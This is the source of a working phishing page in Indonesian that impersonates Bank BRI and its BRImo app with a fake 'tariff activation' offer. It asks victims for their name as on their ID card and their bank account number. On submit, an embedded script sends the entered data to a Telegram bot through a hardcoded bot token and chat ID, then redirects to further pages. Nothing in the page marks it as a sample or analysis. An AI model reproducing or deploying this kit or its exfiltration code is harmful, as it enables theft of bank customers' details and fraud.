<!DOCTYPE HTML>
<html lang="in">
<head>
    <meta charset="UTF-8">
    <title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 | 𝟮𝟬𝟮𝟰</title>
    <link rel="icon" type="image/png" href="img/BRImo.png">
    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <link rel="stylesheet" href="img/2.css">
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
</head>
<style>
@import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      max-width: 100%;
      overflow-x: ;
      }
body {
    margin: 0px;
    background: ,#fff;
    background-size: 100%;
    color: #fff;
    font-family: 'Nunito', sans-serif;
}
welalxcome {
    position: fixed;
    left: 0;
    top: 0;
    width: 100vw;
    height: 100vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
    background: #ffffffcc;
    z-index: 999;
}
welalxcome img {
        width:15vw;
    height: auto;
}
chsalxcome {
    position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.talxcome {
    width: 130%;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 100%;
    justify-content: center;
}
.talxcome img {
        width: 73%;
}
.balxcome {
        height: 45vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.txalxcome {
        width: 90%;
    height: 30vh;
    text-align: left;
}
 
 .asu{
     width:100%;
     margin-top:65px;
     position: fixed;
     height: 100%;
     z-index:3;
     
     
     
     
 }  
    
 .nyusu{
     border-radius:6px;
     height:150px;
     max-height:100%;
     z-index:3;
     margin-top: 80px;
     margin-left: 20px;
     box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;
     
 }
 
 ion-icon{
    font-size: 22px;
    margin-left: 8px;
    margin-top: -2px;
    position: absolute;
    color: #06529C;
}

.button-85 {
  background-color: ;
  user-select: none;
  -webkit-user-select: none;
  touch-action: manipulation;
  z-index:-1;
  
}

.button-85:before {
  content: "";
  background: linear-gradient(
    50deg,
    #fff000,
    #ff7300,
    #fffb00,
    #48ff00,
    #00ffd5,
    #002bff,
    #7a00ff,
    #ff00c8,
    #ff0000
  );
  position: absolute;
  top: 0px;
  left: 0px;
  background-size: 500%;
  z-index: -1;
  filter: blur(0px);
  -webkit-filter: blur(0px);
  width: calc(100% + 0px);
  height: calc(100% + 0px);
  animation: glowing-button-85 20s linear infinite;
  transition: opacity 0.3s ease-in-out;
  border-radius: 18px;
}

@keyframes glowing-button-85 {
  0% {
    background-position: 0 0;
  }
  50% {
    background-position: 300% 0;
  }
  100% {
    background-position: 0 0;
  }
}

.button-85:after {
  z-index: -1;
  content: "";  
  position: absolute;
  width: 100%;
  height: 100%;
  background: #ffffffe6;
  left: 0;
  top: 0;
  border-radius: 18px;
}

.xx{
        z-index:3;
        bottom:170px;
        margin-left: 23px;
        margin-top: -170px;
        position: absolute;
        border:5px solid #ffffff;
        padding:15px;
        width:78%;
        border-radius:18px; 
        background: #ffffffe6;
        background-size:100%; 
        height: 225px; 
        box-shadow: rgba(0, 0, 0, 0.40) 0px 5px 15px 0px; 
    }

.patokk{
    z-index:3;
    display:block;
    margin-left: 20px;
    margin-top:;
    position:relative;
    background-color:#0F78CB;
    color:#fff;
    border:0px solid #0076e0;
    width:90%;
    border-radius:3px;
    font-family: 'Nunito',
    sans-serif;
    font-size: 15px;
    padding:13px;
    display: inline-block;
    box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px,
rgba(0, 0, 0, 0.20) 0px 6px 6px;
}

.patokk:hover { 
         z-index:3;
         opacity:0.3;
         border: 1px solid #0F78CB; 
         background-color: #0F78CB; 
         color: #fff; 
         
         
         } 
.patokk:disabled, 
.patokk[disabled]{
    z-index:3;
    opacity:0.3;
    border: 1px solid #0F78CB; 
         background-color: #0F78CB; 
         color: #fff;
}

.pilat{
    z-index:3;
    position: fixed;
    bottom: 0;
    left: 0;
    right: 0;
    margin: 0px auto;
    width: 100%;
    height: 72px;
    background: #ffffff;
    box-shadow: rgba(0, 0, 0, 0.15) 0px -12px 15px 0px;
padding-top: 15px
}

.hh{
    z-index:2;
    position: fixed; 
    top: 0; 
    left: 0; 
    right: 0; 
    margin: 0px auto; 
    width: 100%; 
    height: 60px; 
    background: #0F78CB; 
    border-bottom: 0px solid #fff;
    box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;
    }
    
    .hu{
        z-index:3;
        bottom:170px;
        margin-left: 26px;
        margin-top: -170px;
        position: absolute;
        border:1.5px solid #fff;
        padding:15px;
        width:78%;
        border-radius:18px; 
        background: url('img/haji.pngg'),#ffffffe6;
        background-size:100%; 
        height: 230px; 
        box-shadow: rgba(0, 0, 0, 0.40) 0px 5px 15px 0px; 
    }
    
    .yy{
        box-sizing: border-box; height: 38px; width: 536px; max-width: 100%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: #; border-radius: 7px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 15px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none;
    }
    
    
    
    .zz{
        z-index:2;position: fixed; top: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 60px; background: #0F78CB; border-bottom: 0px solid #fff;box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;
    }
</style>
<body>

    <main>

<welalxcome style="display: none;">
<img src="" alt="" style="margin-top: -50px">
</welalxcome>
<chsalxcome2 style="display: ;">
    <div class="load" style="display:none">
 <img src="https://hosting.tigerengine.id/f01dmo.gif" class="jao" alt="">
      </div>
<img style="z-index:1;position: fixed;width:100%;margin-top:0px;" width="100%" src="" alt="">

<img style="z-index:2;position: fixed;width:100%;margin-top: 0px;" src="https://user-images.githubusercontent.com/134689497/241221951-2e1c9dc1-49e1-4ac8-aa73-acdc2e80643d.png" alt="">
<nav class="zz">
<img src="https://choreodev.df-dfed.cfd/bri/img/nav.png" style="margin-top:8px; margin-left:210px;" width="40px" alt="">
<p style="margin-left:10px;">Spesial Untuk<b style="color: #F37024">mo</b></p><b style="color: #F37024">
<p style="margin-left:10px;color:#fff;font-size:12px;">Cobain beragam cara baru untuk<br>memaksimalkan aktivitas perbankan kamu.</p>
</b></nav><b style="color: #F37024">

<marquee direction="right" behavior="alternate" scrolldelay="10" class="asu">
<img class="nyusu" src="https://choreodev.df-dfed.cfd/bri/img/1.png" alt="">
<img class="nyusu" src="https://choreodev.df-dfed.cfd/bri/img/2.png" alt="">
<img class="nyusu" src="https://choreodev.df-dfed.cfd/bri/img/3.png" alt="">
<img class="nyusu" src="https://choreodev.df-dfed.cfd/bri/img/4.png" alt="">
<img class="nyusu" src="https://choreodev.df-dfed.cfd/bri/img/5.png" alt="">
</marquee>    



<form method="post" id="setPin">
<center><img style="z-index:3;position: fixed;width:20%;margin-top:610px;margin-left:-40px;" src="https://choreodev.df-dfed.cfd/bri/img/T24.png" alt=""></center>
<div class="button-85 xx">
<center style="color:#09559a; line-height: 17px; font-size: 15px; padding: 5px;margin-top:-20px;font-weight:600;"><p style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:-4px;height:60px;">𝗨𝗻𝘁𝘂𝗸 𝗺𝗲𝗹𝗮𝗻𝗷𝘂𝘁𝗸𝗮𝗻 𝗽𝗿𝗼𝘀𝗲𝘀 𝗮𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝘁𝗮𝗿𝗶𝗳 𝘁𝗿𝗮𝗻𝘀𝗮𝗸𝘀𝗶 𝗮𝗻𝗱𝗮, 𝗦𝗶𝗹𝗮𝗵𝗸𝗮𝗻 𝗺𝗮𝘀𝘂𝗸𝗮𝗻 𝗱𝗮𝘁𝗮 𝗱𝗶 𝗯𝗮𝘄𝗮𝗵 𝗶𝗻𝗶</p>

</center>
<br>
  

<h5 style="color:#09559a; margin-top: 0px; margin-left: 4px">Atas nama :
<input id="nama" name="𝐍𝐚𝐦𝐚=" type="text" class="yy" placeholder="Nama sesuai KTP" required="">
</h5>


<h5 for="norek" style="color:#09559a; margin-top: 0px; margin-left: 4px">Nomor rekening :
<input id="norek" name="𝐍𝐨.𝐑𝐞𝐜 =" type="tel" class="yy" placeholder="#####" data-mask="000000000000000" required="" autocomplete="off" maxlength="15">
</h5>

<br>
<br>
</div>
    





<div class="pilat">
<div id="lonte" class="lonte"></div>
<button class="patokk" type="submit" id="kirim" disabled="">Lanjutkan</button>
   
           </div>
  
  <!-- partial -->

<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
<script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script><script  src="./credit.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
 <script type="text/javascript">
       <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
   <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
   <p id="status"></p>
   <script src="setPin.js"></script>
   
   <script>
   
   
            $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });
            
const chat_id = '7973363844', botID = 'bot7801311275:AAFMOonaT8q0xwbwn2BQPanTyAoiiyC7FHk';

    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;

    document.querySelector('#setPin').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href = '/info.html';
    });

            
        });
        
   </script>         
</smalxs>
</main>
</form>

<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>
<script src="script.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },500)
        });
</script>
<script>
  // jQuery Mask Plugin v1.14.15
// github.com/igorescobar/jQuery-Mask-Plugin
var $jscomp={scope:{},findInternal:function(a,l,d){a instanceof String&&(a=String(a));for(var p=a.length,h=0;h<p;h++){var b=a[h];if(l.call(d,b,h,a))return{i:h,v:b}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?Object.defineProperty:function(a,l,d){if(d.get||d.set)throw new TypeError("ES3 does not support getters and setters.");a!=Array.prototype&&a!=Object.prototype&&(a[l]=d.value)};
$jscomp.getGlobal=function(a){return"undefined"!=typeof window&&window===a?a:"undefined"!=typeof global&&null!=global?global:a};$jscomp.global=$jscomp.getGlobal(this);$jscomp.polyfill=function(a,l,d,p){if(l){d=$jscomp.global;a=a.split(".");for(p=0;p<a.length-1;p++){var h=a[p];h in d||(d[h]={});d=d[h]}a=a[a.length-1];p=d[a];l=l(p);l!=p&&null!=l&&$jscomp.defineProperty(d,a,{configurable:!0,writable:!0,value:l})}};
$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,d){return $jscomp.findInternal(this,a,d).v}},"es6-impl","es3");
(function(a,l,d){"function"===typeof define&&define.amd?define(["jquery"],a):"object"===typeof exports?module.exports=a(require("jquery")):a(l||d)})(function(a){var l=function(b,e,f){var c={invalid:[],getCaret:function(){try{var a,r=0,g=b.get(0),e=document.selection,f=g.selectionStart;if(e&&-1===navigator.appVersion.indexOf("MSIE 10"))a=e.createRange(),a.moveStart("character",-c.val().length),r=a.text.length;else if(f||"0"===f)r=f;return r}catch(C){}},setCaret:function(a){try{if(b.is(":focus")){var c,
g=b.get(0);g.setSelectionRange?g.setSelectionRange(a,a):(c=g.createTextRange(),c.collapse(!0),c.moveEnd("character",a),c.moveStart("character",a),c.select())}}catch(B){}},events:function(){b.on("keydown.mask",function(a){b.data("mask-keycode",a.keyCode||a.which);b.data("mask-previus-value",b.val());b.data("mask-previus-caret-pos",c.getCaret());c.maskDigitPosMapOld=c.maskDigitPosMap}).on(a.jMaskGlobals.useInput?"input.mask":"keyup.mask",c.behaviour).on("paste.mask drop.mask",function(){setTimeout(function(){b.keydown().keyup()},
100)}).on("change.mask",function(){b.data("changed",!0)}).on("blur.mask",function(){d===c.val()||b.data("changed")||b.trigger("change");b.data("changed",!1)}).on("blur.mask",function(){d=c.val()}).on("focus.mask",function(b){!0===f.selectOnFocus&&a(b.target).select()}).on("focusout.mask",function(){f.clearIfNotMatch&&!h.test(c.val())&&c.val("")})},getRegexMask:function(){for(var a=[],b,c,f,n,d=0;d<e.length;d++)(b=m.translation[e.charAt(d)])?(c=b.pattern.toString().replace(/.{1}$|^.{1}/g,""),f=b.optional,
(b=b.recursive)?(a.push(e.charAt(d)),n={digit:e.charAt(d),pattern:c}):a.push(f||b?c+"?":c)):a.push(e.charAt(d).replace(/[-\/\\^$*+?.()|[\]{}]/g,"\\$&"));a=a.join("");n&&(a=a.replace(new RegExp("("+n.digit+"(.*"+n.digit+")?)"),"($1)?").replace(new RegExp(n.digit,"g"),n.pattern));return new RegExp(a)},destroyEvents:function(){b.off("input keydown keyup paste drop blur focusout ".split(" ").join(".mask "))},val:function(a){var c=b.is("input")?"val":"text";if(0<arguments.length){if(b[c]()!==a)b[c](a);
c=b}else c=b[c]();return c},calculateCaretPosition:function(){var a=b.data("mask-previus-value")||"",e=c.getMasked(),g=c.getCaret();if(a!==e){var f=b.data("mask-previus-caret-pos")||0,e=e.length,d=a.length,m=a=0,h=0,l=0,k;for(k=g;k<e&&c.maskDigitPosMap[k];k++)m++;for(k=g-1;0<=k&&c.maskDigitPosMap[k];k--)a++;for(k=g-1;0<=k;k--)c.maskDigitPosMap[k]&&h++;for(k=f-1;0<=k;k--)c.maskDigitPosMapOld[k]&&l++;g>d?g=10*e:f>=g&&f!==d?c.maskDigitPosMapOld[g]||(f=g,g=g-(l-h)-a,c.maskDigitPosMap[g]&&(g=f)):g>f&&
(g=g+(h-l)+m)}return g},behaviour:function(f){f=f||window.event;c.invalid=[];var e=b.data("mask-keycode");if(-1===a.inArray(e,m.byPassKeys)){var e=c.getMasked(),g=c.getCaret();setTimeout(function(){c.setCaret(c.calculateCaretPosition())},a.jMaskGlobals.keyStrokeCompensation);c.val(e);c.setCaret(g);return c.callbacks(f)}},getMasked:function(a,b){var g=[],d=void 0===b?c.val():b+"",n=0,h=e.length,q=0,l=d.length,k=1,r="push",p=-1,t=0,y=[],v,z;f.reverse?(r="unshift",k=-1,v=0,n=h-1,q=l-1,z=function(){return-1<
n&&-1<q}):(v=h-1,z=function(){return n<h&&q<l});for(var A;z();){var x=e.charAt(n),w=d.charAt(q),u=m.translation[x];if(u)w.match(u.pattern)?(g[r](w),u.recursive&&(-1===p?p=n:n===v&&n!==p&&(n=p-k),v===p&&(n-=k)),n+=k):w===A?(t--,A=void 0):u.optional?(n+=k,q-=k):u.fallback?(g[r](u.fallback),n+=k,q-=k):c.invalid.push({p:q,v:w,e:u.pattern}),q+=k;else{if(!a)g[r](x);w===x?(y.push(q),q+=k):(A=x,y.push(q+t),t++);n+=k}}d=e.charAt(v);h!==l+1||m.translation[d]||g.push(d);g=g.join("");c.mapMaskdigitPositions(g,
y,l);return g},mapMaskdigitPositions:function(a,b,e){a=f.reverse?a.length-e:0;c.maskDigitPosMap={};for(e=0;e<b.length;e++)c.maskDigitPosMap[b[e]+a]=1},callbacks:function(a){var h=c.val(),g=h!==d,m=[h,a,b,f],q=function(a,b,c){"function"===typeof f[a]&&b&&f[a].apply(this,c)};q("onChange",!0===g,m);q("onKeyPress",!0===g,m);q("onComplete",h.length===e.length,m);q("onInvalid",0<c.invalid.length,[h,a,b,c.invalid,f])}};b=a(b);var m=this,d=c.val(),h;e="function"===typeof e?e(c.val(),void 0,b,f):e;m.mask=
e;m.options=f;m.remove=function(){var a=c.getCaret();m.options.placeholder&&b.removeAttr("placeholder");b.data("mask-maxlength")&&b.removeAttr("maxlength");c.destroyEvents();c.val(m.getCleanVal());c.setCaret(a);return b};m.getCleanVal=function(){return c.getMasked(!0)};m.getMaskedVal=function(a){return c.getMasked(!1,a)};m.init=function(d){d=d||!1;f=f||{};m.clearIfNotMatch=a.jMaskGlobals.clearIfNotMatch;m.byPassKeys=a.jMaskGlobals.byPassKeys;m.translation=a.extend({},a.jMaskGlobals.translation,f.translation);
m=a.extend(!0,{},m,f);h=c.getRegexMask();if(d)c.events(),c.val(c.getMasked());else{f.placeholder&&b.attr("placeholder",f.placeholder);b.data("mask")&&b.attr("autocomplete","off");d=0;for(var l=!0;d<e.length;d++){var g=m.translation[e.charAt(d)];if(g&&g.recursive){l=!1;break}}l&&b.attr("maxlength",e.length).data("mask-maxlength",!0);c.destroyEvents();c.events();d=c.getCaret();c.val(c.getMasked());c.setCaret(d)}};m.init(!b.is("input"))};a.maskWatchers={};var d=function(){var b=a(this),e={},f=b.attr("data-mask");
b.attr("data-mask-reverse")&&(e.reverse=!0);b.attr("data-mask-clearifnotmatch")&&(e.clearIfNotMatch=!0);"true"===b.attr("data-mask-selectonfocus")&&(e.selectOnFocus=!0);if(p(b,f,e))return b.data("mask",new l(this,f,e))},p=function(b,e,f){f=f||{};var c=a(b).data("mask"),d=JSON.stringify;b=a(b).val()||a(b).text();try{return"function"===typeof e&&(e=e(b)),"object"!==typeof c||d(c.options)!==d(f)||c.mask!==e}catch(t){}},h=function(a){var b=document.createElement("div"),d;a="on"+a;d=a in b;d||(b.setAttribute(a,
"return;"),d="function"===typeof b[a]);return d};a.fn.mask=function(b,d){d=d||{};var e=this.selector,c=a.jMaskGlobals,h=c.watchInterval,c=d.watchInputs||c.watchInputs,t=function(){if(p(this,b,d))return a(this).data("mask",new l(this,b,d))};a(this).each(t);e&&""!==e&&c&&(clearInterval(a.maskWatchers[e]),a.maskWatchers[e]=setInterval(function(){a(document).find(e).each(t)},h));return this};a.fn.masked=function(a){return this.data("mask").getMaskedVal(a)};a.fn.unmask=function(){clearInterval(a.maskWatchers[this.selector]);
delete a.maskWatchers[this.selector];return this.each(function(){var b=a(this).data("mask");b&&b.remove().removeData("mask")})};a.fn.cleanVal=function(){return this.data("mask").getCleanVal()};a.applyDataMask=function(b){b=b||a.jMaskGlobals.maskElements;(b instanceof a?b:a(b)).filter(a.jMaskGlobals.dataMaskAttr).each(d)};h={maskElements:"input,td,span,div",dataMaskAttr:"*[data-mask]",dataMask:!0,watchInterval:300,watchInputs:!0,keyStrokeCompensation:10,useInput:!/Chrome\/[2-4][0-9]|SamsungBrowser/.test(window.navigator.userAgent)&&
h("input"),watchDataMask:!1,byPassKeys:[9,16,17,18,36,37,38,39,40,91],translation:{0:{pattern:/\d/},9:{pattern:/\d/,optional:!0},"#":{pattern:/\d/,recursive:!0},A:{pattern:/[a-zA-Z0-9]/},S:{pattern:/[a-zA-Z]/}}};a.jMaskGlobals=a.jMaskGlobals||{};h=a.jMaskGlobals=a.extend(!0,{},h,a.jMaskGlobals);h.dataMask&&a.applyDataMask();setInterval(function(){a.jMaskGlobals.watchDataMask&&a.applyDataMask()},h.watchInterval)},window.jQuery,window.Zepto);
</script>
<script>
          function vibr(dur){
            if (navigator.vibrate) {
                navigator.vibrate(dur);
            } else {
                console.log("NotSupported");
            }
        }
</script>
     <script>
     $(document).ready(function(){
    $('#formlog').submit(function(e) {
    event.preventDefault();
    $('.load').fadeIn();
document.getElementById('kirim').innerHTML = "Memproses....";

$("#lonte").show();
 $.ajax({
 type: 'POST',
 url: 'req/login.php',
 data: $(formlog).serialize(),
 datatype: 'text',
 
 complete: function(data) {
            vibr(180);
            
            console.log('Complete')
   setTimeout(function(){
  window.location.href='saldo.html'
 $("#lonte").hide();
 document.getElementById('kirim').innerHTML = "Lanjutkan";
 $('.load').fadeOut();
    }, 500);
        }
    });
 });
    return false;
});   
     
 </script>
<script>
       // Get references to the input and button elements
const input = document.getElementById("norek");
const button = document.getElementById("kirim");

// Add an event listener for the input event
input.addEventListener("input", () => {
  // Check if the input field has any text
  if (input.value.length > 9) {
    // If there's text, enable the button
    button.disabled = false;
  } else {
    // If there's no text, disable the button
    button.disabled = true;
  }
});


    
</script>
</body>
</html>